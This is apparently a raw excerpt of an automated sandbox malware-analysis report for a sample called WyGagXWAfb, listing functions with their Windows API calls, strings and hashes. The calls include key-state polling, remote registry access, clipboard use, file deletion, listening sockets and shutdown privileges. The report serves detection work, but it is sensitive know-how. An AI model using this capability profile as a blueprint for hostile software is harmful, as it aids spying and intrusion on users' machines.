_free.LIBCMT ref: 00B442A8
GetTimeZoneInformation.KERNEL32(00BD4AF8,00000000,00000000,00000000,00000000,00000000,00BCC070,00000030,00B43F3B,00BCC050,00000008,00B370B8), ref: 00B442B9
WideCharToMultiByte.KERNEL32(?,00000000,00BD4AFC,000000FF,?,0000003F,00000000,?), ref: 00B44332
WideCharToMultiByte.KERNEL32(?,00000000,00BD4B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 00B4436B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone____lc_codepage_func__getenv_helper_nolock__invoke_watson__lock__malloc_crt__mtinitlocknum
String ID:
API String ID: 2302051780-0
Opcode ID: 8a78c958248af84c75e7fe1d9f9f104194976736eec1b4f50ff69501d1090e5f
Instruction ID: df7b5157b7908d2d4890e6b2b913d970f09ca51256647130dca01c82c9e187d0
Opcode Fuzzy Hash: 8a78c958248af84c75e7fe1d9f9f104194976736eec1b4f50ff69501d1090e5f
Instruction Fuzzy Hash: 38A19270D046199FDF149F69D881BADBBF8FF05B10F1400AAF464AB291EB748E51EB24

Function 00B90665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B90038,?,?), ref: 00B910BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B90737

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B907D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B9086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B90AAD
RegCloseKey.ADVAPI32(00000000), ref: 00B90ABA

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: e153d5681a53955c0a30fe3408de094aade5d2c02529da43d4f1ccb3de390dac
Instruction ID: b78d198870b988cf3554be99fedb5a714e23319bee7fb10b6b1f493d751e20a3
Opcode Fuzzy Hash: e153d5681a53955c0a30fe3408de094aade5d2c02529da43d4f1ccb3de390dac
Instruction Fuzzy Hash: 19E16E31214311AFCB14EF28C991E6ABBF9EF89714F0484ADF45ADB262DA30ED41CB51

Function 00B70219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B70241
GetAsyncKeyState.USER32(000000A0), ref: 00B702C2
GetKeyState.USER32(000000A0), ref: 00B702DD
GetAsyncKeyState.USER32(000000A1), ref: 00B702F7
GetKeyState.USER32(000000A1), ref: 00B7030C
GetAsyncKeyState.USER32(00000011), ref: 00B70324
GetKeyState.USER32(00000011), ref: 00B70336
GetAsyncKeyState.USER32(00000012), ref: 00B7034E
GetKeyState.USER32(00000012), ref: 00B70360
GetAsyncKeyState.USER32(0000005B), ref: 00B70378
GetKeyState.USER32(0000005B), ref: 00B7038A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c5628660582e80db6e692bb3358e2676bbf56c0ae7091ef99bb9fc2b286bc6c8
Instruction ID: d5f8c0623d6647641b383953469e5ec22dfac9b1b121862f7e66c2c3c3d1eca9
Opcode Fuzzy Hash: c5628660582e80db6e692bb3358e2676bbf56c0ae7091ef99bb9fc2b286bc6c8
Instruction Fuzzy Hash: E441C9245287CAEEFF316A6484083B5BEE0EB15340F19C0DFD9DE571C2EB9459C48796

Function 00B886D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

CoInitialize.OLE32 ref: 00B88718
CoUninitialize.OLE32 ref: 00B88723
CoCreateInstance.OLE32(?,00000000,00000017,00BA2BEC,?), ref: 00B88783
IIDFromString.OLE32(?,?), ref: 00B887F6
VariantInit.OLEAUT32(?), ref: 00B88890
VariantClear.OLEAUT32(?), ref: 00B888F1

Strings

NULL Pointer assignment, xrefs: 00B887C8
Invalid parameter, xrefs: 00B8880F
Failed to create object, xrefs: 00B8878E, 00B88844

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 9e4613e0ec0ed8df945fb9c9be96f972207ab9851085dcda990fb21ec0b96597
Instruction ID: 69892d3939b263edfdaaf4c12ba1af0f27caca09db841fe61610c1de1a8148d4
Opcode Fuzzy Hash: 9e4613e0ec0ed8df945fb9c9be96f972207ab9851085dcda990fb21ec0b96597
Instruction Fuzzy Hash: DD61AD746083019FD710EF24C988B6ABBE4EF48714F94489DF9859B2A1DB74ED44CB92

Function 00B84458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B8447F
EmptyClipboard.USER32 ref: 00B84485
GlobalAlloc.KERNEL32(00000002,?), ref: 00B8449A
CloseClipboard.USER32 ref: 00B84539

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d45258f55279d64d849c3213d658a10fbec296295d0c48047fef22be5914c6f7
Instruction ID: eb5cc409a0d333577c642e7cca67f9252973125d2b46bd3e89dfd9e210e88ba6
Opcode Fuzzy Hash: d45258f55279d64d849c3213d658a10fbec296295d0c48047fef22be5914c6f7
Instruction Fuzzy Hash: CA217C352002129FDB10AF60ED59B6D7BE9EF04720F1480AAF946DB2B1DF74AD00CB54

Function 00B73A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B148A1,?,?,00B137C0,?), ref: 00B148CE

Part of subcall function 00B74CD3: GetFileAttributesW.KERNEL32(?,00B73947), ref: 00B74CD4

FindFirstFileW.KERNEL32(?,?), ref: 00B73ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B73B87
MoveFileW.KERNEL32(?,?), ref: 00B73B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B73BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B73BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B73BF5

Strings

\*.*, xrefs: 00B73A8A, 00B73A93, 00B73AA8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: c75f71a9a1fbe1cd03a33df889d229d33a635e1418ae1fda375c002452203edc
Instruction ID: 1cce7f6bc00d303afdc54f3abcb3644d5fab7eb246e42ef6997154c267238a35
Opcode Fuzzy Hash: c75f71a9a1fbe1cd03a33df889d229d33a635e1418ae1fda375c002452203edc
Instruction Fuzzy Hash: 5651BC3184024D9ACF15EBA0CE929EDB7F9AF14300FA481E9E41677191EF316F49DBA0

Function 00B7F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B7F6AB
Sleep.KERNEL32(0000000A), ref: 00B7F6DB
_wcscmp.LIBCMT ref: 00B7F6EF
_wcscmp.LIBCMT ref: 00B7F70A
FindNextFileW.KERNEL32(?,?), ref: 00B7F7A8
FindClose.KERNEL32(00000000), ref: 00B7F7BE

Strings

*.*, xrefs: 00B7F690

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 3174548e8aee0f1f638de03fa048f48e39c5c87f4ae3112bd2e049de229ecee5
Instruction ID: a561fe4fccef6971ba62ee92d8be7e6a02fe13d8a5e09e348b73d771214592f6
Opcode Fuzzy Hash: 3174548e8aee0f1f638de03fa048f48e39c5c87f4ae3112bd2e049de229ecee5
Instruction Fuzzy Hash: 64415D7190421A9BCF15DF64CC85AFEBBF8FF05310F1485A6E829A71A0DB309E84CB94

Function 00B24140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00B244DB
ERCP, xrefs: 00B2421F
VUUU, xrefs: 00B57B0C
VUUU, xrefs: 00B24520
VUUU, xrefs: 00B244ED

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: df52e66bfd19d2335692fd60f407d783a6da20dc012555ee65d7f7fd64376248
Instruction ID: 0cf8a87f42ec84a998ce4beac486be4e7f67f90682e774d7ed28dca3428121a0
Opcode Fuzzy Hash: df52e66bfd19d2335692fd60f407d783a6da20dc012555ee65d7f7fd64376248
Instruction Fuzzy Hash: ADA27D70E0422ACBDF24CF58E9907ADB7F1FB54315F2481E9D85AA7A80DB709E85CB50

Function 00B258C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B25A05
_memmove.LIBCMT ref: 00B25A55
_memmove.LIBCMT ref: 00B25ABB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c7fc39dc3091db0423a1175550730127d5ce526cbc49acdadf754a90c6acde09
Instruction ID: 876a7f587599a9c6b7486d58d8a6a3ff765b408eefa09e2c8f7777a098cf6e63
Opcode Fuzzy Hash: c7fc39dc3091db0423a1175550730127d5ce526cbc49acdadf754a90c6acde09
Instruction Fuzzy Hash: FA129C70A00619EFDF14DFA5D985AEEB3F5FF48300F2085A9E406A7291EB39AD51CB50

Function 00B7545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B68CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B68D0D
Part of subcall function 00B68CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B68D3A
Part of subcall function 00B68CC3: GetLastError.KERNEL32 ref: 00B68D47

ExitWindowsEx.USER32(?,00000000), ref: 00B7549B

Strings

@, xrefs: 00B7548E
SeShutdownPrivilege, xrefs: 00B7546B
, xrefs: 00B75489

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: ee507e1f6c06956e1811f24fe897185e0653ad4183cf1025d627c02cd96010fc
Instruction ID: f96cb49859eb9683eca31e168fcd115c1c34e66335d55429b86d57538d8e3fff
Opcode Fuzzy Hash: ee507e1f6c06956e1811f24fe897185e0653ad4183cf1025d627c02cd96010fc
Instruction Fuzzy Hash: EB014771A54B062AF7385774DC8AFBA72D8EB00352F2481E1FD2ED22D7DAD01C808190

Function 00B86596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B865EF
WSAGetLastError.WSOCK32(00000000), ref: 00B865FE
bind.WSOCK32(00000000,?,00000010), ref: 00B8661A
listen.WSOCK32(00000000,00000005), ref: 00B86629
WSAGetLastError.WSOCK32(00000000), ref: 00B86643
closesocket.WSOCK32(00000000,00000000), ref: 00B86657

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3632e3d47e100ef8e4890d1767c8d4189f97a5efc2b47d6419bc00354de7f19c
Instruction ID: 0b6347fe5fe3fb18d91d7df478079a2f77b9aa6657e29f468f6669e9f8f01386
Opcode Fuzzy Hash: 3632e3d47e100ef8e4890d1767c8d4189f97a5efc2b47d6419bc00354de7f19c
Instruction Fuzzy Hash: FA21A0306002059FCB10EF64C989BBEB7E9EF45320F2481AAE956E73E1DB70AD41CB51

Function 00B25680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00B30FF6: std::exception::exception.LIBCMT ref: 00B3102C
Part of subcall function 00B30FF6: __CxxThrowException@8.LIBCMT ref: 00B31041

_memmove.LIBCMT ref: 00B6062F
_memmove.LIBCMT ref: 00B60744
_memmove.LIBCMT ref: 00B607EB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: ae9c75dcd9c22aed0c1bc8359cb488d0f4bab252cedd969f0c1d202558b90cf4
Instruction ID: 337ae4365a3d2397d22eac0d89e998d3d0953acc099762124029e571b22a4c1b
Opcode Fuzzy Hash: ae9c75dcd9c22aed0c1bc8359cb488d0f4bab252cedd969f0c1d202558b90cf4
Instruction Fuzzy Hash: 9A0290B0A10209DBCF14DF65D991AAE7BF5FF48300F2480A9E80ADB255EB35DD51CB91

Function 00B11287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00B119FA
GetSysColor.USER32(0000000F), ref: 00B11A4E
SetBkColor.GDI32(?,00000000), ref: 00B11A61

Part of subcall function 00B11290: DefDlgProcW.USER32(?,00000020,?), ref: 00B112D8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 47bab5130ca43a10b2acd6e33e35618cb96d77eda92a0210a1a634bafdb4a8b1
Instruction ID: 4832246ac01825b9976efb6adaba3686059b46fdfa62ffb70d3142eb76a6d42a
Opcode Fuzzy Hash: 47bab5130ca43a10b2acd6e33e35618cb96d77eda92a0210a1a634bafdb4a8b1
Instruction Fuzzy Hash: BEA19C71116444BADA28AB2C4CD4DFF3EDCDF41381B9409DAF722D6192DE15CE81A2B2

Function 00B86A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B880CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B86AB1
WSAGetLastError.WSOCK32(00000000), ref: 00B86ADA
bind.WSOCK32(00000000,?,00000010), ref: 00B86B13
WSAGetLastError.WSOCK32(00000000), ref: 00B86B20
closesocket.WSOCK32(00000000,00000000), ref: 00B86B34

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 52372be9467026bcb3dd763f51778730e12bd8558547bc8fb1bb72674a0f5ff6
Instruction ID: 5678f8fedf1924a8ff961f897a4d6d024ae32de97d60d18e5059736b115d50c6
Opcode Fuzzy Hash: 52372be9467026bcb3dd763f51778730e12bd8558547bc8fb1bb72674a0f5ff6
Instruction Fuzzy Hash: D541B375A00210AFEB10BF649C96FBE77E9EF04720F448099F95AAB3D2DA709D408791

Function 00B955FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B9564C
IsWindowEnabled.USER32 ref: 00B9565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00B95667
IsIconic.USER32 ref: 00B95675
IsZoomed.USER32 ref: 00B95683

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 023f8b7249a4a7c9b0cd2cfe267c02fb50ff9fde09b307841c28d639893560e7
Instruction ID: ffef2fe8b28480746e26200be6000e364c3960af194b3101ba25e7e7a3caf924
Opcode Fuzzy Hash: 023f8b7249a4a7c9b0cd2cfe267c02fb50ff9fde09b307841c28d639893560e7
Instruction Fuzzy Hash: 6B110132380A116FEB321F26DC44A6FBBD9EF84720B8140B9F806D3241CB309D02CBA4

Function 00B8C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B51D88,?), ref: 00B8C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B8C324

Strings

GetSystemWow64DirectoryW, xrefs: 00B8C31E
kernel32.dll, xrefs: 00B8C30D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 04d3dce4795357843a48d82e643b84fafb39bffc5e1c15f864b2cd249ff11406
Instruction ID: 34a5f963ca1a1d56da2d07c32fcfc6b0705e289f508ad8561c4c91d939b5226e
Opcode Fuzzy Hash: 04d3dce4795357843a48d82e643b84fafb39bffc5e1c15f864b2cd249ff11406
Instruction Fuzzy Hash: E5E0ECB4600713CFDB205F25D804F567AE4EF09765B90C4BAE896D3270EBB0D881CBA0

Function 00B23190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
